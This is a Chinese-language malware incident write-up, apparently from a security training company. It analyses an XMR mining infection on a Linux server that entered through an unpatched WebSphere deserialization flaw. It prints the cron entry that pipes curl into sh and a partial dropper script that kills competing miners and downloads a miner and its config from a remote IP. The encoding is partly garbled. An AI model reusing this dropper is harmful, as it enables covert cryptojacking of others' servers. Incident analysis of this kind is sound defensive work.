近期，客戶通報(bào)其服務(wù)器運(yùn)行異常。經(jīng)過(guò)安全技術(shù)人員的檢查，發(fā)現(xiàn)了這是一例典型的利用Linux服務(wù)器漏洞實(shí)施XMR挖礦的安全事件。當(dāng)前網(wǎng)絡(luò)安全事件中黑客利用系統(tǒng)漏洞實(shí)施挖礦的事件頻見(jiàn)報(bào)道，而本團(tuán)隊(duì)在實(shí)際工作中卻頭回遇到，因此對(duì)該樣本實(shí)施了具體分析。

1、主機(jī)環(huán)境為L(zhǎng)inux

./kswapd0 -c ksvjptcyah.cf -t 2

利用IP查詢，發(fā)現(xiàn)其是德國(guó)的服務(wù)器。具體如下圖所示：

還發(fā)現(xiàn)，該服務(wù)器還開(kāi)放5555端口(返回和80端口一致)、8080端口。用瀏覽器直接訪問(wèn)8080端口，發(fā)現(xiàn)其是electroneum礦池。其主頁(yè)返回如下圖所示：

ksvjptcyah.cf內(nèi)容

"url" : "stratum+tcp://148.251.133.246:80",

 

 

"algo" : "cryptonight",

}

其中礦池地址為：148.251.133.246:80

EUsTrUFJNGvgK4q2dQFfsY41pihj9PMc

在該礦池的界面，通過(guò)搜索發(fā)現(xiàn)該帳號(hào)挖礦的具體情況如下圖所示：

4、利用kill殺掉kswapd0進(jìn)程。

./ Ksvjptcyah -c Ksvjptcyah .cf -t 2。

果然，發(fā)現(xiàn)啟動(dòng)任務(wù)如下：

*/30 * * * * curl/Article/UploadPic/2018-4/2018416184522986.jpg|sh

對(duì)其直接利用瀏覽器訪問(wèn)，現(xiàn)實(shí)的是apache ubuntu 缺省頁(yè)面。如下圖所示：

用curl直接下載回本地，發(fā)現(xiàn)其內(nèi)容如下：

id1="adcixstgtf"

id3="kswapd0"

rm -rf /var/tmp/`echo $id1`.conf

ps auxf|grep -v grep|grep "\-px"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep"cryptonight"|awk '{print $2}'|xargs kill -9

ps -fe|grep `echo $id2`|grep -v grep

then

chmod 777 /var/tmp/`echo $id2`.cf

curl -o /var/tmp/`echo $id2`.cfhttp://181.214.87.241/java/`echo $id3`.cf

chmod 777 /var/tmp/`echo $id3`

cat /proc/cpuinfo|grep aes>/dev/null

then

wget -O /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`

curl -o /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`_an

fi

cd /var/tmp

cores=$((($proc+1)/2))

else

fi

然后從181.214.87.241服務(wù)器下載配置文件和挖礦程序。

6、服務(wù)器如何被感染的?

<p style="box-sizing: border-box; padding: 0px; margin: 10px 0px; color: rgb(51, 51, 51); font-family: " segoe="" ui",="" "lucida="" grande",="" helvetica,="" arial,="" "microsoft="" yahei",="" freesans,="" arimo,="" "droid="" sans",="" "wenquanyi="" micro="" hei",="" "hiragino="" sans="" gb",="" gb="" w3",="" fontawesome,="" sans-serif;="" font-size:="" 14px;="" font-style:="" normal;="" font-variant:="" font-weight:="" letter-spacing:="" text-align:="" start;="" text-transform:="" none;="" white-space:="" word-spacing:="" 0px;="" -webkit-text-stroke-width:="" background-color:="" rgb(255,="" 255,="" 255);="" text-indent:="" 2em;="" line-height:="" 2em;"="">安全技術(shù)人員通過(guò)對(duì)該服務(wù)器的再次分析，發(fā)現(xiàn)其websphere軟件沒(méi)有補(bǔ)丁，黑客是利用該軟件的java 反序列漏洞直接控制本服務(wù)器。
 

以上內(nèi)容由四川無(wú)國(guó)界(mqptxio.cn) 整理編輯——專業(yè)從事網(wǎng)絡(luò)信息安全培訓(xùn)與IT風(fēng)險(xiǎn)管理咨詢服務(wù)。